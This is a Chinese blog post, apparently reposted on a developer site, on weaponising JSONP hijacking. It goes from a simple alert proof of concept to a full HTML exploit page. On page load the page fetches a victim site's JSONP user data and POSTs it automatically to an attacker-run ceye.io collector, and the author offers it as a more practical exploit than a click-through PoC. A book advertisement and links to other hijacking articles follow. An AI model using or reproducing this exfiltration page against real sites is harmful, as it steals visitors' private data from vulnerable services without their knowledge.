内容简介:之前测jsonp劫持的时候一般是弹个alert,就做poc了,突然想试试实际利用一下是什么样子,于是就开始尝试做个实际利用的poc。在网上看到一般的证明脚本是
之前测jsonp劫持的时候一般是弹个alert,就做poc了,
突然想试试实际利用一下是什么样子,于是就开始尝试做个实际利用的poc。
正文
在网上看到一般的证明脚本是
<script>
function lego(json){
alert(JSON.stringify(json))
}
</script>
<script src="http://vulweb.com/info?callback=lego"></script>
于是我便想尝试一下去构造一个可以来直接利用的exp
在安全客上看到了关于jsonp劫持的exp https://www.anquanke.com/post/id/152339
因为这个脚本利用的是get方法
如果劫持到的数据过多,用get请求的时候会返回414(URI太长 )
于是我就想用post的方法去请求
这种exp不能自动发起请求,需要点击按键。
与CSRF利用一样,如果用burpsuite生成的csrf-poc是用个submit按钮的,
在实际利用中还是差一点的,
所以我还是想让它变得更加实用一点。
首先是使用onload事件,
<body onload="load()">
即页面加载完成后执行一个方法,
这个方法利用有post请求,就可以完成我所想实现的了。
exp
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>JSONP EXP跨域测试</title>
</head>
<body onload="load()">
<script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js">
</script>
<script>
function load()
{
$.ajax({
url: "http://xxx.com/info?callback=lego",
type: "GET", //指定GET请求方法
dataType: "jsonp", //指定服务器返回的数据类型
jsonp: "callback", //指定参数名称
jsonpCallback: "lego",
success: function (data) {
$.ajax({
type: 'POST',
url: 'http://yourceye.ceye.io/',
data: JSON.stringify(data)
});
}
})
}
</script>
</body>
</html>
当然,需要在ceye.io中注册一个账号。
效果
当然这也不是什么很有技术内容的文章,只是想跟大家分享一下一些小trick,多多包涵。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 利用PLC自带网络功能劫持PLC
- 病毒利用安全产品模块 劫持流量、攻击其他安全软件
- 黑客利用DNS劫持控制了多个国家的国家域名
- 黑客利用 NSA 黑客工具劫持数万台计算机
- 挖洞经验 | 利用CSRF漏洞劫持Youtube用户的通知消息
- 攻防最前线:利用劫持邮箱回复邮件去传播URSNIF银行木马
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Ajax与PHP Web开发
达里 / 王德民、王新颖、刘昕 / 人民邮电出版社 / 2007-4 / 39.00元
本书指导读者使用Ajax、PHP及其他相关技术建立快速响应的网页。本书不仅从Ajax的客户端和服务器端技术两个方面指导读者逐步掌握Ajax基础应用,还通过实例详细演示了Ajax表单验证、Ajax聊天室、Ajax Suggest、使用SVG实现的Ajax实时绘图程序、Ajax Grid、Ajax RSS阅读器和Ajax拖放等的实现过程。同时还介绍了在Windows和UNIX系统下的应用程序环境配置和......一起来看看 《Ajax与PHP Web开发》 这本书的介绍吧!